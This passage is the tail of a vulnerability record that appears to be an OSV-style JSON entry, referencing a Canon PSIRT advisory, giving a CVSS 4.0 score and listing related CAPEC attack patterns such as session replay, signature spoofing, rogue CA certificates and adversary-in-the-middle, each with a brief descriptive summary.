"type": "WEB",
"url": "https://www.canon-europe.com/psirt/advisory-information"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
No mitigation information available for this CWE.
CAPEC-21: Exploitation of Trusted Identifiers
An adversary guesses, obtains, or "rides" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.
CAPEC-22: Exploiting Trust in Client
An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
CAPEC-459: Creating a Rogue Certification Authority Certificate
An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their "to be signed" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.
CAPEC-461: Web Services API Signature Forgery Leveraging Hash Function Extension Weakness
An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.
CAPEC-473: Signature Spoof
An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.
CAPEC-476: Signature Spoofing by Misrepresentation
An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.
CAPEC-59: Session Credential Falsification through Prediction
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
CAPEC-60: Reusing Session IDs (aka Session Replay)
This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.
CAPEC-667: Bluetooth Impersonation AttackS (BIAS)
An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.
CAPEC-94: Adversary in the Middle (AiTM)
An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.